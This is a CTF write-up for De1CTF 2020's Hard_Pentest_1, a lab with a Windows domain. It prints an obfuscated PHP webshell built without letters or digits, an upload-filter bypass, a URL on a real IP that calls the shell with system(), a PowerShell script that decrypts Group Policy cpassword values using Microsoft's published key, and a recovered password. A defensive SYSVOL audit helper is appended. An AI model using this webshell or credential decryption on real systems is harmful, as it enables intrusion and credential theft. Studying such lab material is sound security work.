Hard_Pentest_1 Reproduction

Webshell without digits or letters

Upload bypass: short tags together with P神's (phith0n's) webshell without digits or letters are enough to get past the content filter; the filename check is bypassed simply by changing the case of the extension, because the target runs Windows.

exp

<?= $_=[] ?> 
<?= $_=@"$_" ?>
<?= $_=$_[('!'=='@')] ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ = "_".$__ ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ .= $__ ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ .= $__ ?>

<?= ${$_______}["_"](${$_______}["__"]) ?>

Dropping a one-line webshell:

http://47.113.219.76/uploads/d8ffd2952b7416f6096c2481dfad4351/6539886cfe4730b929fa714a800aa44a_6.Php?_=system&__=echo "<?php phpinfo()?>">>1.php

Domain penetration

After uploading cmd.exe and running net user, a hint points to \\192.168.0.12\Hint


There is a zip archive containing hints for flag1 and flag2.


Recovering passwords saved in Group Policy from SYSVOL

Reference: 3gstudent's article 域渗透——利用SYSVOL还原组策略中保存的密码 (Domain Penetration: Using SYSVOL to Recover Passwords Saved in Group Policy)

Every domain has a default share path:

\\<DOMAIN>\SYSVOL\<DOMAIN>\

The domain name can be read from ipconfig /all:


Open the following path directly:

//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/


Locate the configuration file under the matching policy GUID, the Group.xml shown below:

//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/


In short: the SYSVOL share stores configuration for domain accounts -> find the entry for the HintZip_Pass user -> find the AES-256-encrypted password; because Microsoft has published the key, that logon password can be recovered -> finally extract the archive. The cpassword value below is the encrypted credential.


Decryption script

function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param (
        [string] $Cpassword
    )

    try {
        # Restore the Base64 padding that the stored cpassword value omits
        $Mod = ($Cpassword.length % 4)

        switch ($Mod) {
            '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
            '2' {$Cpassword += ('=' * (4 - $Mod))}
            '3' {$Cpassword += ('=' * (4 - $Mod))}
        }

        $Base64Decoded = [Convert]::FromBase64String($Cpassword)

        # Create a new AES .NET crypto object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        # The static AES-256 key Microsoft published for Group Policy Preferences
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

        # Set the IV to all zeros to prevent dynamic generation of the IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length)
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor()
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

        # The plaintext is stored as UTF-16LE
        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    }
    catch {Write-Error $Error[0]}
}
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"

Run it:

powershell -executionpolicy bypass -file 1.ps1
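The same SYSVOL exposure is easy to audit from the defender's side. The helper below is an added example written for this page (not from the writeup, 3gstudent or PowerSploit): it walks the Policies folder of SYSVOL and reports every Group Policy Preference XML that still carries a cpassword attribute, so the preference can be deleted and the account rotated. The domain name De1CTF2020.lab is taken from the writeup; pass your own with -Domain.

```powershell
# Added audit helper: find Group Policy Preference files under SYSVOL that
# still store a cpassword. Assumes read access to \\<domain>\SYSVOL.
function Find-GppCpassword {
    [CmdletBinding()]
    Param (
        [string] $Domain = 'De1CTF2020.lab'   # assumed; replace with your domain
    )

    # Preference files that can embed cpassword (see Microsoft KB2962486 / MS14-025)
    $Targets = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml',
               'DataSources.xml', 'Printers.xml', 'Drives.xml'
    $PolicyRoot = "\\$Domain\SYSVOL\$Domain\Policies"

    Get-ChildItem -Path $PolicyRoot -Recurse -Include $Targets -ErrorAction SilentlyContinue |
        ForEach-Object {
            $File = $_
            [xml] $Doc = Get-Content -Path $File.FullName -Raw

            # Any element with a non-empty cpassword attribute is a stored credential,
            # whatever its element name (Properties under User, NTService, Task, ...)
            foreach ($Node in $Doc.SelectNodes('//*[@cpassword != ""]')) {
                # The account attribute differs per file type; take the first one present
                $Account = @($Node.userName, $Node.accountName, $Node.runAs) |
                           Where-Object { $_ } | Select-Object -First 1
                if (-not $Account) { $Account = '(none)' }

                # The GPO GUID is the {...} folder directly under Policies
                $PolicyId = if ($File.FullName -match '\{[0-9A-Fa-f-]{36}\}') { $Matches[0] } else { '?' }

                [PSCustomObject]@{
                    PolicyId = $PolicyId
                    File     = $File.FullName
                    Account  = $Account
                    Changed  = $Node.ParentNode.changed
                }
            }
        }
}

# Every row is a credential that must be removed from the GPO and rotated;
# an empty result is the desired state.
Find-GppCpassword | Format-Table -AutoSize
```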


The archive password is: zL1PpP@sSwO3d

Extracting it gives the flag:

